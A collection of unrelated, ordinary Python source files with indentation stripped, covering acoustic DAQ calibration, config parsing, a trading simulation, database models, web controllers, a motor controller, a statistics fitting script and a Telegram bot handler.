token.set_value('envelope.rise_time', rise_time)
token.set_value('sweep.start', freq_lb)
token.set_value('sweep.stop', freq_ub)
waveform = generate_waveform(token, fs, duration=duration,
calibration=calibration, vrms=vrms)
daq_kw = {
'waveform': waveform,
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': iti,
'callback': callback,
'output_range': 10,
'input_range': input_range,
}
self.iface_acquire = ni.DAQmxAcquireWaveform(**daq_kw)
self.fs = fs
self.sig_waveform = waveform
self.iti = iti
def acquire(self, join=True):
self.iface_acquire.start()
if join:
self.iface_acquire.join()
def process(self, fft_window='boxcar', waveform_averages=4,
input_gains=None):
# Subtract one from the trim because the DAQmx interface is configured
# to acquire one sample less than int(waveform_duration+iti). This
# allows the card to be reset properly so it can acquire on the next
# trigger.
time = np.arange(self.sig_waveform.shape[-1])/self.fs
mic_waveforms = self.iface_acquire.get_waveforms(remove_iti=True)
if mic_waveforms.shape[-1] != self.sig_waveform.shape[-1]:
raise ValueError('shapes do not match')
if input_gains is not None:
# Correct for measurement gain settings
input_gains = np.asarray(input_gains)[..., np.newaxis]
mic_waveforms = mic_waveforms/input_gains
mic_frequency = psd_freq(mic_waveforms[0, 0, :], self.fs)
sig_frequency = psd_freq(self.sig_waveform, self.fs)
mic_csd = csd(mic_waveforms, self.fs, fft_window, waveform_averages)
mic_phase = np.unwrap(np.angle(mic_csd)).mean(axis=0)
mic_psd = np.mean(2*np.abs(mic_csd)/np.sqrt(2.0), axis=0)
sig_csd = csd(self.sig_waveform, self.fs, fft_window)
sig_phase = np.unwrap(np.angle(sig_csd))
sig_psd = 2*np.abs(sig_csd)/np.sqrt(2.0)
return {
'fs': self.fs,
'mic_frequency': mic_frequency,
'sig_frequency': sig_frequency,
'mic_psd': mic_psd,
'sig_psd': sig_psd,
'mic_phase_raw': mic_phase,
'mic_phase': mic_phase-sig_phase[np.newaxis],
'sig_phase': sig_phase,
'time': time,
'sig_waveform': self.sig_waveform,
'mic_waveforms': mic_waveforms,
}
def chirp_power(waveform_averages=4, fft_window='boxcar', **kwargs):
c = ChirpCalibration(**kwargs)
c.acquire()
return c.process(fft_window, waveform_averages)
class GolayCalibration(object):
def __init__(self, n=16, vpp=1, gain=0, repetitions=1, iti=0.01,
ab_delay=2, fs=200e3, input_range=10,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, callback=None):
self.a, self.b = golay_pair(n)
self.a *= vpp
self.b *= vpp
self.daq_kw = {
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': iti,
'callback': self.poll,
'input_range': input_range,
'output_range': vpp,
}
self.running = None
self.callback = callback
self.ab_delay = ab_delay
self.fs = fs
self.vpp = vpp
def poll(self, epochs_acquired, complete):
if complete and self.running == 'a':
self.a_waveforms = \
self.iface_acquire.get_waveforms(remove_iti=True)
self.callback(epochs_acquired, False)
threading.Timer(self.ab_delay, self.acquire_b).start()
elif complete and self.running == 'b':
self.b_waveforms = \
self.iface_acquire.get_waveforms(remove_iti=True)
self.callback(epochs_acquired, True)
else:
self.callback(epochs_acquired, False)
def acquire(self, join=True):
self.acquire_a()
def acquire_a(self):
self.running = 'a'
self.iface_acquire = \
ni.DAQmxAcquireWaveform(waveform=self.a, **self.daq_kw)
self.iface_acquire.start()
def acquire_b(self):
self.running = 'b'
self.iface_acquire = \
ni.DAQmxAcquireWaveform(waveform=self.b, **self.daq_kw)
self.iface_acquire.start()
def process(self, waveform_averages, input_gains=None, discard=1,
smoothing_window=5):
result = summarize_golay(self.fs, self.a, self.b,
self.a_waveforms[discard:],
self.b_waveforms[discard:],
waveform_averages,
input_gains)
mic_waveforms = np.concatenate((self.a_waveforms, self.b_waveforms),
axis=-1)
sig_waveform = np.concatenate((self.a, self.b), axis=-1)
sig_csd = csd(sig_waveform, self.fs)
sig_phase = np.unwrap(np.angle(sig_csd))
sig_psd = 2*np.abs(sig_csd)/np.sqrt(2.0)
sig_frequency = psd_freq(sig_waveform, self.fs)
result.update({
'mic_waveforms': mic_waveforms,
'sig_waveform': sig_waveform,
'sig_psd': sig_psd,
'sig_phase': sig_phase,
'sig_frequency': sig_frequency,
})
return result
def summarize_golay(fs, a, b, a_response, b_response, waveform_averages=None,
input_gains=None):
n_epochs, n_channels, n_time = a_response.shape
if waveform_averages is not None:
new_shape = (waveform_averages, -1, n_channels, n_time)
a_response = a_response.reshape(new_shape).mean(axis=0)
b_response = b_response.reshape(new_shape).mean(axis=0)
if input_gains is not None:
# Correct for measurement gain settings
input_gains = np.asarray(input_gains)[..., np.newaxis]
a_response = a_response/input_gains
b_response = b_response/input_gains
time = np.arange(a_response.shape[-1])/fs
freq, tf_psd, tf_phase = golay_transfer_function(a, b, a_response,
b_response, fs)
tf_psd = tf_psd.mean(axis=0)
tf_phase = tf_phase.mean(axis=0)
return {
'fs': fs,
'a': a,
'b': b,
'a_response': a_response,
'b_response': b_response,
'time': time,
'tf_psd': tf_psd,
'tf_phase': tf_phase,
'mic_frequency': freq,
}
def golay_tf(*args, **kwargs):
c = GolayCalibration(*args, **kwargs)
c.acquire()
return c.process()
|
import configparser
import logging
import os
from pathlib import Path
from . import consts
logger = logging.getLogger()
def read_config(path):
config = configparser.ConfigParser()
config.read(path)
return config
def parse_config(args):
default_config_path = os.path.expanduser('~/.eden')
if not os.path.exists(default_config_path):
os.makedirs(default_config_path)
config_file_path = os.path.expanduser(args['config_path'])
config_file = Path(config_file_path)
if not config_file.is_file():
logger.info(f"Config file {config_file} is empty")
return None
return read_config(config_file)
def config_write_overrides(args, config, profile_name, fail_on_missing_non_default_profile=True):
updated = False
if profile_name not in config:
config[profile_name] = {}
if profile_name != consts.DEFAULT_PROFILE_NAME and fail_on_missing_non_default_profile:
logger.error("")
return None, None
for parameter in consts.parameters:
key = parameter['name']
if key not in args:
continue
value = args[key]
if value is None:
continue
logger.info(f"Setting {key} to {value} in profile {profile_name}")
config[profile_name][key] = value
updated = True
return config, updated
def check_profile(config, profile):
errors = 0
if profile == "DEFAULT":
logger.debug("Skipping ConfigParser DEFAULT profile (comes up even if not in file)")
return 0
if profile not in config:
logger.error(f"Profile {profile} is not in config file")
errors += 1
return errors
for parameter in consts.parameters:
key = parameter['name']
if key not in config[profile]:
logger.error(f"Necessary key {key} is not provided for profile {profile}")
errors += 1
continue
value = config[profile][key]
if value is None:
logger.error(f"Necessary key {key} is None for profile {profile}")
errors += 1
continue
if not parameter['validator'](value):
logger.error(f"Validation failed for key {key} in profile {profile}")
errors += 1
continue
for k in config[profile]:
if k not in consts.parameter_names:
logger.error(f"Unknown config key {k} in profile {profile}")
errors += 1
continue
return errors
def create_envvar_dict(args, config, profile_name):
variables = {}
for parameter in consts.parameters:
parameter_name = parameter['name']
envvar_name = parameter['envvar_name']
if parameter_name in args:
if args[parameter_name] is not None:
variables[envvar_name] = args[parameter_name]
continue
if profile_name not in config or parameter_name not in config[profile_name]:
logger.error(f"Necessary parameter {parameter_name} not found in profile {profile_name} "
f"and is not provided as an argument")
exit(-1)
else:
variables[envvar_name] = config[profile_name][parameter_name]
return variables
def dump_profile(args, config, profile_name):
variables = {}
for parameter in consts.parameters:
parameter_name = parameter['name']
if parameter_name in args:
if args[parameter_name] is not None:
variables[parameter_name] = args[parameter_name]
continue
if profile_name not in config or parameter_name not in config[profile_name]:
logger.error(f"Necessary parameter {parameter_name} not found in profile {profile_name} "
f"and is not provided as an argument")
exit(-1)
else:
variables[parameter_name] = config[profile_name][parameter_name]
return variables
|
"""
The aim of this file is to give a standalone example of how an environment runs.
"""
import os
import numpy as np
from tgym.core import DataGenerator
from tgym.envs.trading_tick import TickTrading
from tgym.gens.deterministic import WavySignal, RandomGenerator
from tgym.gens.csvstream import CSVStreamer
gen_type = 'C'
if gen_type == 'W':
generator = WavySignal(period_1=25, period_2=50, epsilon=-0.5,ba_spread = 0.0001 )
elif gen_type == 'R':
generator = RandomGenerator(spread = 0.0001,range_low =1.0,range_high=2.0)
elif gen_type == 'C':
filename = r'./examples/price_usdeur.csv'
generator = CSVStreamer(filename=filename)
episode_length = 200000
trading_fee = 0.2
time_fee = 0
# history_length number of historical states in the observation vector.
history_length = 2
profit_taken = 10
stop_loss = -5
render_show = False
environment = TickTrading( data_generator=generator,
trading_fee=trading_fee,
time_fee=time_fee,
history_length=history_length,
episode_length=episode_length,
profit_taken = profit_taken,
stop_loss = stop_loss)
if render_show :
environment.render()
i = 0
while True:
#action = input("Action: Buy (b) / Sell (s) / Hold (enter): ")
# if action == 'b':
# action = [0, 1, 0]
# elif action == 's':
# action = [0, 0, 1]
# else:
# action = [1, 0, 0]
'''
kind of random action
'''
action = [0, 1, 0] if i%7 == 0 else ([0, 0, 1] if i%13 == 0 else [1, 0, 0])
environment.step(action)
if render_show :
environment.render()
i += 1
|
from sqlalchemy import Column, Integer, String
from .database import Base
class Blog(Base):
__tablename__ = "blogs"
id = Column(Integer, primary_key=True, index=True)
title = Column(String)
body = Column(String)
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, index=True)
name = Column(String)
email = Column(String)
password = Column(String)
|
"""
Custom Controllers for DRKCM
License: MIT
"""
from gluon import current
from gluon.html import *
from gluon.storage import Storage
from core import FS, CustomController
THEME = "DRK"
# =============================================================================
class index(CustomController):
""" Custom Home Page """
def __call__(self):
output = {}
T = current.T
auth = current.auth
settings = current.deployment_settings
# Defaults
login_form = None
login_div = None
announcements = None
announcements_title = None
roles = current.session.s3.roles
sr = auth.get_system_roles()
if sr.AUTHENTICATED in roles:
# Logged-in user
# => display announcements
from core import S3DateTime
dtrepr = lambda dt: S3DateTime.datetime_represent(dt, utc=True)
filter_roles = roles if sr.ADMIN not in roles else None
posts = self.get_announcements(roles=filter_roles)
# Render announcements list
announcements = UL(_class="announcements")
if posts:
announcements_title = T("Announcements")
priority_classes = {2: "announcement-important",
3: "announcement-critical",
}
priority_icons = {2: "fa-exclamation-circle",
3: "fa-exclamation-triangle",
}
for post in posts:
# The header
header = H4(post.name)
# Priority
priority = post.priority
# Add icon to header?
icon_class = priority_icons.get(post.priority)
if icon_class:
header = TAG[""](I(_class="fa %s announcement-icon" % icon_class),
header,
)
# Priority class for the box
prio = priority_classes.get(priority, "")
row = LI(DIV(DIV(DIV(dtrepr(post.date),
_class = "announcement-date",
),
_class="fright",
),
DIV(DIV(header,
_class = "announcement-header",
),
DIV(XML(post.body),
_class = "announcement-body",
),
_class="announcement-text",
),
_class = "announcement-box %s" % prio,
),
)
announcements.append(row)
else:
# Anonymous user
# => provide a login box
login_div = DIV(H3(T("Login")),
)
auth.messages.submit_button = T("Login")
login_form = auth.login(inline=True)
output = {"login_div": login_div,
"login_form": login_form,
"announcements": announcements,
"announcements_title": announcements_title,
}
# Custom view and homepage styles
self._view(settings.get_theme_layouts(), "index.html")
return output
# -------------------------------------------------------------------------
@staticmethod
def get_announcements(roles=None):
"""
Get current announcements
Args:
roles: filter announcement by these roles
Returns:
any announcements (Rows)
"""
db = current.db
s3db = current.s3db
# Look up all announcements
ptable = s3db.cms_post
stable = s3db.cms_series
join = stable.on((stable.id == ptable.series_id) & \
(stable.name == "Announcements") & \
(stable.deleted == False))
query = (ptable.date <= current.request.utcnow) & \
(ptable.expired == False) & \
(ptable.deleted == False)
if roles:
# Filter posts by roles
ltable = s3db.cms_post_role
q = (ltable.group_id.belongs(roles)) & \
(ltable.deleted == False)
rows = db(q).select(ltable.post_id,
cache = s3db.cache,
groupby = ltable.post_id,
)
post_ids = {row.post_id for row in rows}
query = (ptable.id.belongs(post_ids)) & query
posts = db(query).select(ptable.name,
ptable.body,
ptable.date,
ptable.priority,
join = join,
orderby = (~ptable.priority, ~ptable.date),
limitby = (0, 5),
)
return posts
# =============================================================================
class userstats(CustomController):
"""
Custom controller to provide user account statistics per
root organisation (for accounting in a shared instance)
"""
def __init__(self):
super(userstats, self).__init__()
self._root_orgs = None
self._stats = None
# -------------------------------------------------------------------------
def __call__(self):
""" The userstats controller """
# Require ORG_GROUP_ADMIN
auth = current.auth
if not auth.s3_has_role("ORG_GROUP_ADMIN"):
auth.permission.fail()
from core import S3CRUD, s3_get_extension, crud_request
request = current.request
args = request.args
# Create an CRUDRequest
r = crud_request("org", "organisation",
c = "default",
f = "index/%s" % args[0],
args = args[1:],
extension = s3_get_extension(request),
)
# Filter to root organisations
resource = r.resource
resource.add_filter(FS("id").belongs(self.root_orgs))
# Configure field methods
from gluon import Field
table = resource.table
table.total_accounts = Field.Method("total_accounts", self.total_accounts)
table.active_accounts = Field.Method("active_accounts", self.active_accounts)
table.disabled_accounts = Field.Method("disabled_accounts", self.disabled_accounts)
table.active30 = Field.Method("active30", self.active30)
# Labels for field methods
T = current.T
TOTAL = T("Total User Accounts")
ACTIVE = T("Active")
DISABLED = T("Inactive")
ACTIVE30 = T("Logged-in Last 30 Days")
# Configure list_fields
list_fields = ("id",
"name",
(TOTAL, "total_accounts"),
(ACTIVE, "active_accounts"),
(DISABLED, "disabled_accounts"),
(ACTIVE30, "active30"),
)
# Configure form
from core import S3SQLCustomForm, S3SQLVirtualField
crud_form = S3SQLCustomForm("name",
S3SQLVirtualField("total_accounts",
label = TOTAL,
),
S3SQLVirtualField("active_accounts",
label = ACTIVE,
),
S3SQLVirtualField("disabled_accounts",
label = DISABLED,
),
S3SQLVirtualField("active30",
label = ACTIVE30,
),
)
# Configure read-only
resource.configure(insertable = False,
editable = False,
deletable = False,
crud_form = crud_form,
filter_widgets = None,
list_fields = list_fields,
)
output = r(rheader=self.rheader)
if isinstance(output, dict):
output["title"] = T("User Statistics")
# URL to open the resource
open_url = S3CRUD._linkto(r, update=False)("[id]")
# Add action button for open
action_buttons = S3CRUD.action_buttons
action_buttons(r,
deletable = False,
copyable = False,
editable = False,
read_url = open_url,
)
return output
# -------------------------------------------------------------------------
@staticmethod
def rheader(r):
"""
Show the current date in the output
Args:
r: the CRUDRequest
Returns:
the page header (rheader)
"""
from core import S3DateTime
today = S3DateTime.datetime_represent(r.utcnow, utc=True)
return P("%s: %s" % (current.T("Date"), today))
# -------------------------------------------------------------------------
@property
def root_orgs(self):
"""
A set of root organisation IDs (lazy property)
"""
root_orgs = self._root_orgs
if root_orgs is None:
db = current.db
s3db = current.s3db
table = s3db.org_organisation
query = (table.root_organisation == table.id) & \
(table.deleted == False)
rows = db(query).select(table.id)
self._root_orgs = root_orgs = set(row.id for row in rows)
return root_orgs
# -------------------------------------------------------------------------
@property
def stats(self):
"""
User account statistics per root organisation (lazy property)
"""
stats = self._stats
if stats is None:
db = current.db
s3db = current.s3db
utable = s3db.auth_user
otable = s3db.org_organisation
left = otable.on(otable.id == utable.organisation_id)
query = (utable.deleted == False)
users = db(query).select(otable.root_organisation,
utable.registration_key,
utable.timestmp,
left = left,
)
# Determine activity period start
import datetime
now = current.request.utcnow
start = (now - datetime.timedelta(days=30)).replace(hour = 0,
minute = 0,
second = 0,
microsecond = 0,
)
# Collect stats
stats = {}
for user in users:
account = user.auth_user
organisation = user.org_organisation
root_org = organisation.root_organisation
if not root_org:
continue
if root_org in stats:
org_stats = stats[root_org]
else:
org_stats = stats[root_org] = {"total": 0,
"disabled": 0,
"active30": 0,
}
# Count total accounts
org_stats["total"] += 1
# Count inactive accounts
if account.registration_key:
org_stats["disabled"] += 1
# Count accounts logged-in in the last 30 days
timestmp = account.timestmp
if timestmp and timestmp >= start:
org_stats["active30"] += 1
self._stats = stats
return stats
# -------------------------------------------------------------------------
def total_accounts(self, row):
"""
Field method to return the total number of user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["total"] if stats else 0
# -------------------------------------------------------------------------
def active_accounts(self, row):
"""
Field method to return the number of active user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
if stats:
result = stats["total"] - stats["disabled"]
else:
result = 0
return result
# -------------------------------------------------------------------------
def disabled_accounts(self, row):
"""
Field method to return the number of disabled user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["disabled"] if stats else 0
# -------------------------------------------------------------------------
def active30(self, row):
"""
Field method to return the number of user accounts for the
organisation which have been used over the past 30 days
(useful to verify the number of active accounts)
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["active30"] if stats else 0
# END =========================================================================
|
#!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""This module contains the definition of a discrete pseudo motor controller
for the Sardana Device Pool"""
__all__ = ["DiscretePseudoMotorController"]
__docformat__ = 'restructuredtext'
import json
from sardana import DataAccess
from sardana.pool.controller import PseudoMotorController
from sardana.pool.controller import Type, Access, Description
class DiscretePseudoMotorController(PseudoMotorController):
"""
A discrete pseudo motor controller which converts physical motor
positions to discrete values"""
gender = "DiscretePseudoMotorController"
model = "PseudoMotor"
organization = "Sardana team"
image = ""
pseudo_motor_roles = ("DiscreteMoveable",)
motor_roles = ("ContinuousMoveable",)
axis_attributes = {'Configuration':
# type hackish until encoded attributes supported
{Type: str,
Description: 'String dictionary mapping the labels'
' and discrete positions',
Access: DataAccess.ReadWrite}
}
def __init__(self, inst, props, *args, **kwargs):
PseudoMotorController.__init__(self, inst, props, *args, **kwargs)
self._calibration = []
self._positions = []
self._labels = []
self._configuration = None
self._calibration_cfg = None
self._positions_cfg = None
self._labels_cfg = None
def GetAxisAttributes(self, axis):
axis_attrs = PseudoMotorController.GetAxisAttributes(self, axis)
axis_attrs = dict(axis_attrs)
axis_attrs['Position']['type'] = float
return axis_attrs
def CalcPseudo(self, axis, physical_pos, curr_pseudo_pos):
positions = self._positions_cfg
calibration = self._calibration_cfg
labels = self._labels_cfg
llabels = len(labels)
lcalibration = len(calibration)
value = physical_pos[0]
# case 0: nothing to translate, only round about integer the attribute
# value
if llabels == 0:
return int(value)
# case 1: only uses the labels. Available positions in POSITIONS
elif lcalibration == 0:
value = int(value)
try:
positions.index(value)
except Exception:
raise Exception("Invalid position.")
else:
return value
# case 1+fussy: the physical position must be in one of the defined
# ranges, and the DiscretePseudoMotor position is defined in labels
elif llabels == lcalibration:
for fussyPos in calibration:
if value >= fussyPos[0] and value <= fussyPos[2]:
return positions[calibration.index(fussyPos)]
# if the loop ends, current value is not in the fussy areas.
raise Exception("Invalid position.")
else:
raise Exception("Bad configuration on axis attributes.")
def CalcPhysical(self, axis, pseudo_pos, curr_physical_pos):
positions = self._positions_cfg
calibration = self._calibration_cfg
labels = self._labels_cfg
# If Labels is well defined, the write value must be one this struct
llabels = len(labels)
lcalibration = len(calibration)
value = pseudo_pos[0]
# case 0: nothing to translate, what is written goes to the attribute
if llabels == 0:
return value
# case 1: only uses the labels. Available positions in POSITIONS
elif lcalibration == 0:
self._log.debug("Value = %s", value)
try:
positions.index(value)
except Exception:
raise Exception("Invalid position.")
return value
# case 1+fussy: the write to the to the DiscretePseudoMotorController
# is translated to the central position of the calibration.
elif llabels == lcalibration:
self._log.debug("Value = %s", value)
try:
destination = positions.index(value)
except Exception:
raise Exception("Invalid position.")
self._log.debug("destination = %s", destination)
calibrated_position = calibration[
destination][1] # central element
self._log.debug("calibrated_position = %s", calibrated_position)
return calibrated_position
def getConfiguration(self, axis):
return json.dumps(self._configuration)
def setConfiguration(self, axis, value):
try:
mapping = json.loads(value)
labels = []
positions = []
calibration = []
for k, v in list(mapping.items()):
labels.append(k)
pos = int(v['pos'])
if pos in positions:
msg = 'position {0} is already used'.format(pos)
raise ValueError(msg)
positions.append(pos)
if all([x in list(v.keys()) for x in ['min', 'set', 'max']]):
calibration.append([v['min'], v['set'], v['max']])
self._labels_cfg = labels
self._positions_cfg = positions
self._calibration_cfg = calibration
self._configuration = json.loads(value)
except Exception as e:
msg = "invalid configuration: {0}".format(e)
raise Exception(msg)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 24 19:11:35 2020
@author: garci
"""
'''
A PROBABILITY DENSITY FUNCTION (PDF) FITTING PROGRAM
pdsfit_more.py - fit multiple datasets to probability distributions and tabulate all statistical data thereof to Excel
Andrew Garcia, 2020
'''
from scipy import stats
import numpy as np
import matplotlib.pylab as plt
# import xlwings as xw
import pandas as pd
#frame_pdsfit has make and LastRow
from frame_pdsfit import *
''' ARGS LIBRARY (line 27) '''
# import the necessary packages
import argparse
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
'----------------------------------------------------------------------------------------'
'SPECIFY PATH AND FILE NAME HERE'
ap.add_argument("-p", "--path",
default= '/home/andrew/scripts/statistics/templates-examples/pdsfit/dataset',
help="global path to folder containing folders with datasets")
ap.add_argument("-fn", "--xlfilename", default='Results.xls',
help="To simplify iteration of several fits, all Excel files from \
different experiments (different folders) should have the same name\
(default file name: Results.xls)")
'----------------------------------------------------------------------------------------'
ap.add_argument("-s", "--sheet", default='Results',
help="name of sheet containing dataset (default: Results)")
ap.add_argument("-n", "--column_name", default='value',
help="column name to get histogram info ")
ap.add_argument("-d", "--distribution", default=['gauss','lognorm','expon','gamma','beta'],
nargs = '+', type =str,
help="distribution fitting models *type each separated by a space\
i.e. -d gauss lognorm ... (default: all)")
ap.add_argument("-plt", "--plots", default='y',
help="make plots for all data being fitted (default: y[yes])")
ap.add_argument("-b", "--bins", type=int, default=8,
help="# of bins to display for histogram (default: 8)")
ap.add_argument("-r", "--xrange", default=None,nargs = '+',
help="range of x-axis expressed as: -r low high [e.g. -r 0 400] (default: None)")
ap.add_argument("-c", "--colorbins", default='dodgerblue',
help="color of bins (default: 'dodgerblue')")
ap.add_argument("-xl", "--toExcel", default='y',
help="tabulate results of all statistical fits to excel file\\ python pandas module\
(default: y[yes])")
args = vars(ap.parse_args())
import os
folders = os.listdir(args["path"])
print(folders)
def mult(toexcel=args["toExcel"]):
Gval = []
folder_names = os.listdir(args["path"])
for name in folder_names:
# book=xw.Book(args["path"]+r'/'+ name + r'/' + args["xlfilename"])
book = pd.read_excel(args["path"]+r'/'+ name + r'/' + args["xlfilename"])
# idx = args["sheet"]
# column_data = book.sheets[idx].range( args["column"] + ':' + args["column"][0]+str(lastRow(idx,book)) ).value
# plt.style.use("ggplot")
f = make_wplt if args["plots"] == 'y' else make
lbl,val = f(book[args["column_name"]], name,args["distribution"],bins=args["bins"],\
xlims=[float(args["xrange"][0]),float(args["xrange"][1])] \
if args["xrange"] is not None else '', colorbins=args["colorbins"])
# lbl,val = f(column_data, name,args["distribution"],bins=args["bins"],\
# xlims=[float(args["xrange"][0]),float(args["xrange"][1])] \
# if args["xrange"] is not None else '', colorbins=args["colorbins"])
# book.close()
Gval.append(val)
df = pd.DataFrame(Gval, columns=lbl)
df.insert(0,'Experiment Name',folder_names)
print(df)
if toexcel == 'y':
'write to excel'
# wb = xw.Book()
# sht = wb.sheets['Sheet1']
# sht.range('A1').value = df
# sht.range('A1').options(pd.DataFrame, expand='table').value
df.to_excel('/home/andrew/scripts/statistics/pdsfitmore_info.xlsx', index = False)
mult()
|
def get_person():
name="leonardo"
age=35
country="uk"
return name,age,country
name,age,country = get_person()
print(name)
print(age)
print(country)
|
from aiogram.types import ContentTypes, Message
from dialog.avatar_picture_dialog import AvatarDialog
from dialog.main_menu import MainMenuDialog
from lib.depcont import DepContainer
async def sticker_handler(message: Message):
s = message.sticker
await message.reply(f'Sticker: {s.emoji}: {s.file_id}')
def init_dialogs(d: DepContainer):
MainMenuDialog.register(d)
mm = MainMenuDialog
AvatarDialog.register(d, mm, mm.entry_point)
d.dp.register_message_handler(sticker_handler, content_types=ContentTypes.STICKER, state='*')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.